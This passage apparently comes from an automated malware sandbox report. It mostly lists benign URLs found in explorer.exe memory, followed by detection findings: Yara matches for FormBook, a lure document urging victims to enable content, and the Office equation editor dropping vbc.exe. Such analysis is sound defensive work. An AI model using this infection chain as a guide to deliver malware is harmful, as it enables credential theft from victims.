          Source: explorer.exe, 00000006.00000000.2191611814.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.yahoo.co.jp/favicon.ico
          Source: explorer.exe, 00000006.00000000.2191611814.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.yahoo.com/
          Source: explorer.exe, 00000006.00000000.2191611814.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.yahoo.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2191611814.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.yahooapis.jp/AssistSearchService/V2/webassistSearch?output=iejson&amp;p=
          Source: explorer.exe, 00000006.00000000.2191611814.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.yam.com/
          Source: explorer.exe, 00000006.00000000.2191611814.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search1.taobao.com/
          Source: explorer.exe, 00000006.00000000.2191611814.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search2.estadao.com.br/
          Source: explorer.exe, 00000006.00000000.2191611814.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://searchresults.news.com.au/
          Source: explorer.exe, 00000006.00000000.2182336720.0000000004F30000.00000002.00000001.sdmpString found in binary or memory: http://servername/isapibackend.dll
          Source: explorer.exe, 00000006.00000000.2191611814.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://service2.bfast.com/
          Source: explorer.exe, 00000006.00000000.2180212488.0000000003E27000.00000002.00000001.sdmpString found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
          Source: explorer.exe, 00000006.00000000.2191611814.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://sitesearch.timesonline.co.uk/
          Source: explorer.exe, 00000006.00000000.2191611814.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://so-net.search.goo.ne.jp/
          Source: explorer.exe, 00000006.00000000.2191611814.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://suche.aol.de/
          Source: explorer.exe, 00000006.00000000.2191611814.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://suche.freenet.de/
          Source: explorer.exe, 00000006.00000000.2191611814.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://suche.freenet.de/favicon.ico
          Source: explorer.exe, 00000006.00000000.2191611814.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://suche.lycos.de/
          Source: explorer.exe, 00000006.00000000.2191611814.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://suche.t-online.de/
          Source: explorer.exe, 00000006.00000000.2191611814.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://suche.web.de/
          Source: explorer.exe, 00000006.00000000.2191611814.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://suche.web.de/favicon.ico
          Source: explorer.exe, 00000006.00000000.2181552252.0000000004B50000.00000002.00000001.sdmpString found in binary or memory: http://treyresearch.net
          Source: explorer.exe, 00000006.00000000.2191611814.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://tw.search.yahoo.com/
          Source: explorer.exe, 00000006.00000000.2191611814.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://udn.com/
          Source: explorer.exe, 00000006.00000000.2191611814.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://udn.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2191611814.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://uk.ask.com/
          Source: explorer.exe, 00000006.00000000.2191611814.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://uk.ask.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2191611814.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://uk.search.yahoo.com/
          Source: explorer.exe, 00000006.00000000.2191611814.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://vachercher.lycos.fr/
          Source: explorer.exe, 00000006.00000000.2191611814.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://video.globo.com/
          Source: explorer.exe, 00000006.00000000.2191611814.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://video.globo.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2191611814.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://web.ask.com/
          Source: explorer.exe, 00000006.00000000.2181552252.0000000004B50000.00000002.00000001.sdmpString found in binary or memory: http://wellformedweb.org/CommentAPI/
          Source: explorer.exe, 00000006.00000000.2180212488.0000000003E27000.00000002.00000001.sdmpString found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
          Source: explorer.exe, 00000006.00000002.2380112198.0000000001C70000.00000002.00000001.sdmpString found in binary or memory: http://www.%s.comPA
          Source: explorer.exe, 00000006.00000000.2191611814.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.abril.com.br/
          Source: explorer.exe, 00000006.00000000.2191611814.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.abril.com.br/favicon.ico
          Source: explorer.exe, 00000006.00000000.2191611814.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.afisha.ru/App_Themes/Default/images/favicon.ico
          Source: explorer.exe, 00000006.00000000.2191611814.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.alarabiya.net/
          Source: explorer.exe, 00000006.00000000.2191611814.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.alarabiya.net/favicon.ico
          Source: explorer.exe, 00000006.00000000.2191611814.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.amazon.co.jp/
          Source: explorer.exe, 00000006.00000000.2191611814.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.amazon.co.uk/
          Source: explorer.exe, 00000006.00000000.2191611814.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.amazon.com/exec/obidos/external-search/104-2981279-3455918?index=blended&amp;keyword=
          Source: explorer.exe, 00000006.00000000.2191611814.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.amazon.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2191611814.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.amazon.com/gp/search?ie=UTF8&amp;tag=ie8search-20&amp;index=blended&amp;linkCode=qs&amp;c
          Source: explorer.exe, 00000006.00000000.2191611814.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.amazon.de/
          Source: explorer.exe, 00000006.00000000.2191611814.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.aol.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2191611814.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.arrakis.com/
          Source: explorer.exe, 00000006.00000000.2191611814.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.arrakis.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2191611814.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.asharqalawsat.com/
          Source: explorer.exe, 00000006.00000000.2191611814.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.asharqalawsat.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2191611814.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.ask.com/
          Source: explorer.exe, 00000006.00000000.2191611814.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.auction.co.kr/auction.ico
          Source: explorer.exe, 00000006.00000000.2191611814.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.baidu.com/
          Source: explorer.exe, 00000006.00000000.2191611814.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.baidu.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2191611814.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.cdiscount.com/
          Source: explorer.exe, 00000006.00000000.2191611814.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.cdiscount.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2191611814.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.ceneo.pl/
          Source: explorer.exe, 00000006.00000000.2191611814.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.ceneo.pl/favicon.ico
          Source: explorer.exe, 00000006.00000000.2191611814.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.chennaionline.com/ncommon/images/collogo.ico
          Source: explorer.exe, 00000006.00000000.2191611814.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.cjmall.com/
          Source: explorer.exe, 00000006.00000000.2191611814.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.cjmall.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2191611814.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.clarin.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2191611814.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.cnet.co.uk/
          Source: explorer.exe, 00000006.00000000.2191611814.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.cnet.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2191611814.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.dailymail.co.uk/
          Source: explorer.exe, 00000006.00000000.2191611814.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.dailymail.co.uk/favicon.ico
          Source: explorer.exe, 00000006.00000000.2191611814.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.etmall.com.tw/
          Source: explorer.exe, 00000006.00000000.2191611814.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.etmall.com.tw/favicon.ico
          Source: explorer.exe, 00000006.00000000.2191611814.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.excite.co.jp/
          Source: explorer.exe, 00000006.00000000.2191611814.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.expedia.com/
          Source: explorer.exe, 00000006.00000000.2191611814.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.expedia.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2181552252.0000000004B50000.00000002.00000001.sdmpString found in binary or memory: http://www.expedia.com/pub/agent.dll?qscr=mcst&strt1=%1&city1=%2&stnm1=%4&zipc1=%3&cnty1=5?http://ww
          Source: explorer.exe, 00000006.00000000.2191611814.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.gismeteo.ru/favicon.ico
          Source: explorer.exe, 00000006.00000000.2191611814.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.gmarket.co.kr/
          Source: explorer.exe, 00000006.00000000.2191611814.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.gmarket.co.kr/favicon.ico
          Source: explorer.exe, 00000006.00000000.2191611814.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.co.in/
          Source: explorer.exe, 00000006.00000000.2191611814.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.co.jp/
          Source: explorer.exe, 00000006.00000000.2191611814.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.co.uk/
          Source: explorer.exe, 00000006.00000000.2191611814.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.com.br/
          Source: explorer.exe, 00000006.00000000.2191611814.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.com.sa/
          Source: explorer.exe, 00000006.00000000.2191611814.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.com.tw/
          Source: explorer.exe, 00000006.00000000.2191611814.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.com/
          Source: explorer.exe, 00000006.00000000.2191611814.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2191611814.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.cz/
          Source: explorer.exe, 00000006.00000000.2191611814.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.de/
          Source: explorer.exe, 00000006.00000000.2191611814.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.es/
          Source: explorer.exe, 00000006.00000000.2191611814.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.fr/
          Source: explorer.exe, 00000006.00000000.2191611814.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.it/
          Source: explorer.exe, 00000006.00000000.2191611814.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.pl/
          Source: explorer.exe, 00000006.00000000.2191611814.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.ru/
          Source: explorer.exe, 00000006.00000000.2191611814.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.si/
          Source: explorer.exe, 00000006.00000000.2179952602.0000000003C40000.00000002.00000001.sdmpString found in binary or memory: http://www.hotmail.com/oe
          Source: explorer.exe, 00000006.00000000.2191611814.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.iask.com/
          Source: explorer.exe, 00000006.00000000.2191611814.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.iask.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2180212488.0000000003E27000.00000002.00000001.sdmpString found in binary or memory: http://www.icra.org/vocabulary/.
          Source: explorer.exe, 00000006.00000000.2181552252.0000000004B50000.00000002.00000001.sdmpString found in binary or memory: http://www.iis.fhg.de/audioPA
          Source: explorer.exe, 00000006.00000000.2191611814.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.kkbox.com.tw/
          Source: explorer.exe, 00000006.00000000.2191611814.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.kkbox.com.tw/favicon.ico
          Source: explorer.exe, 00000006.00000000.2191611814.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.linternaute.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2191611814.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.maktoob.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2191611814.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.mercadolibre.com.mx/
          Source: explorer.exe, 00000006.00000000.2191611814.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.mercadolibre.com.mx/favicon.ico
          Source: explorer.exe, 00000006.00000000.2191611814.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.mercadolivre.com.br/
          Source: explorer.exe, 00000006.00000000.2191611814.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.mercadolivre.com.br/favicon.ico
          Source: explorer.exe, 00000006.00000000.2191611814.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.merlin.com.pl/
          Source: explorer.exe, 00000006.00000000.2191611814.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.merlin.com.pl/favicon.ico
          Source: explorer.exe, 00000006.00000000.2191611814.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.microsofttranslator.com/?ref=IE8Activity
          Source: explorer.exe, 00000006.00000000.2191611814.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.microsofttranslator.com/BV.aspx?ref=IE8Activity&amp;a=
          Source: explorer.exe, 00000006.00000000.2191611814.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.microsofttranslator.com/BVPrev.aspx?ref=IE8Activity
          Source: explorer.exe, 00000006.00000000.2191611814.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.microsofttranslator.com/Default.aspx?ref=IE8Activity
          Source: explorer.exe, 00000006.00000000.2191611814.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.microsofttranslator.com/DefaultPrev.aspx?ref=IE8Activity
          Source: explorer.exe, 00000006.00000000.2179952602.0000000003C40000.00000002.00000001.sdmpString found in binary or memory: http://www.msnbc.com/news/ticker.txt
          Source: explorer.exe, 00000006.00000000.2191611814.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.mtv.com/
          Source: explorer.exe, 00000006.00000000.2191611814.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.mtv.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2191611814.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.myspace.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2191611814.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.najdi.si/
          Source: explorer.exe, 00000006.00000000.2191611814.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.najdi.si/favicon.ico
          Source: explorer.exe, 00000006.00000000.2191611814.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.nate.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2191611814.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.neckermann.de/
          Source: explorer.exe, 00000006.00000000.2191611814.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.neckermann.de/favicon.ico
          Source: explorer.exe, 00000006.00000000.2191611814.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.news.com.au/favicon.ico
          Source: explorer.exe, 00000006.00000000.2191611814.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.nifty.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2191611814.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.ocn.ne.jp/favicon.ico
          Source: explorer.exe, 00000006.00000000.2191611814.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.orange.fr/
          Source: explorer.exe, 00000006.00000000.2191611814.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.otto.de/favicon.ico
          Source: explorer.exe, 00000006.00000000.2191611814.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.ozon.ru/
          Source: explorer.exe, 00000006.00000000.2191611814.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.ozon.ru/favicon.ico
          Source: explorer.exe, 00000006.00000000.2191611814.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.ozu.es/favicon.ico
          Source: explorer.exe, 00000006.00000000.2191611814.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.paginasamarillas.es/
          Source: explorer.exe, 00000006.00000000.2191611814.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.paginasamarillas.es/favicon.ico
          Source: explorer.exe, 00000006.00000000.2191611814.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.pchome.com.tw/favicon.ico
          Source: explorer.exe, 00000006.00000000.2179799392.00000000039F4000.00000004.00000001.sdmpString found in binary or memory: http://www.piriform.com/ccleaner
          Source: explorer.exe, 00000006.00000000.2187708199.00000000085AC000.00000004.00000001.sdmpString found in binary or memory: http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleaner
          Source: explorer.exe, 00000006.00000000.2187801380.000000000861C000.00000004.00000001.sdmpString found in binary or memory: http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanerv
          Source: explorer.exe, 00000006.00000000.2191611814.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.priceminister.com/
          Source: explorer.exe, 00000006.00000000.2191611814.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.priceminister.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2191611814.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.rakuten.co.jp/favicon.ico
          Source: explorer.exe, 00000006.00000000.2191611814.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.rambler.ru/
          Source: explorer.exe, 00000006.00000000.2191611814.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.rambler.ru/favicon.ico
          Source: explorer.exe, 00000006.00000000.2191611814.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.recherche.aol.fr/
          Source: explorer.exe, 00000006.00000000.2191611814.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.rtl.de/
          Source: explorer.exe, 00000006.00000000.2191611814.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.rtl.de/favicon.ico
          Source: explorer.exe, 00000006.00000000.2191611814.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.servicios.clarin.com/
          Source: explorer.exe, 00000006.00000000.2191611814.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.shopzilla.com/
          Source: explorer.exe, 00000006.00000000.2191611814.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.sify.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2191611814.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.so-net.ne.jp/share/favicon.ico
          Source: explorer.exe, 00000006.00000000.2191611814.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.sogou.com/
          Source: explorer.exe, 00000006.00000000.2191611814.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.sogou.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2191611814.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.soso.com/
          Source: explorer.exe, 00000006.00000000.2191611814.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.soso.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2191611814.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.t-online.de/favicon.ico
          Source: explorer.exe, 00000006.00000000.2191611814.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.taobao.com/
          Source: explorer.exe, 00000006.00000000.2191611814.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.taobao.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2191611814.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.target.com/
          Source: explorer.exe, 00000006.00000000.2191611814.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.target.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2191611814.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.tchibo.de/
          Source: explorer.exe, 00000006.00000000.2191611814.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.tchibo.de/favicon.ico
          Source: explorer.exe, 00000006.00000000.2191611814.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.tesco.com/
          Source: explorer.exe, 00000006.00000000.2191611814.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.tesco.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2191611814.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.timesonline.co.uk/img/favicon.ico
          Source: explorer.exe, 00000006.00000000.2191611814.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.tiscali.it/favicon.ico
          Source: explorer.exe, 00000006.00000000.2191611814.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.univision.com/
          Source: explorer.exe, 00000006.00000000.2191611814.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.univision.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2191611814.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.walmart.com/
          Source: explorer.exe, 00000006.00000000.2191611814.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.walmart.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2179952602.0000000003C40000.00000002.00000001.sdmpString found in binary or memory: http://www.windows.com/pctv.
          Source: explorer.exe, 00000006.00000000.2191611814.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.ya.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2191611814.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.yam.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2191611814.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www3.fnac.com/
          Source: explorer.exe, 00000006.00000000.2191611814.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www3.fnac.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2191611814.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://xml-us.amznxslt.com/onca/xml?Service=AWSECommerceService&amp;Version=2008-06-26&amp;Operation
          Source: explorer.exe, 00000006.00000000.2191611814.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://z.about.com/m/a08.ico

          E-Banking Fraud:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000004.00000002.2167761188.0000000003418000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.2201051835.0000000000290000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.2379730656.00000000001F0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.2201088200.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.2379462611.00000000000C0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.2200951539.00000000000F0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.2379686421.00000000001C0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 5.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE

          System Summary:

          barindex
          Malicious sample detected (through community Yara rule)Show sources
          Source: 00000004.00000002.2167761188.0000000003418000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000004.00000002.2167761188.0000000003418000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000005.00000002.2201051835.0000000000290000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000002.2201051835.0000000000290000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000007.00000002.2379730656.00000000001F0000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000007.00000002.2379730656.00000000001F0000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000005.00000002.2201088200.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000002.2201088200.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000007.00000002.2379462611.00000000000C0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000007.00000002.2379462611.00000000000C0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000005.00000002.2200951539.00000000000F0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000002.2200951539.00000000000F0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000007.00000002.2379686421.00000000001C0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000007.00000002.2379686421.00000000001C0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 5.2.vbc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 5.2.vbc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 5.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 5.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)Show sources
          Source: Screenshot number: 4Screenshot OCR: Enable Content from the yellow bar above 22 23 24 25 26 27 28 0 29 . 30 31 32 33 34 3
          Office equation editor drops PE fileShow sources
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\vbc.exeJump to dropped file
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\winlog[1].exeJump to dropped file
          Source: C:\Users\Public\vbc.exeMemory allocated: 76E20000 page execute and read and write
          Source: C:\Users\Public\vbc.exeMemory allocated: 76D20000 page execute and read and write
          Source: C:\Users\Public\vbc.exeMemory allocated: 76E20000 page execute and read and write
          Source: C:\Users\Public\vbc.exeMemory allocated: 76D20000 page execute and read and write
          Source: C:\Windows\SysWOW64\systray.exeMemory allocated: 76E20000 page execute and read and write
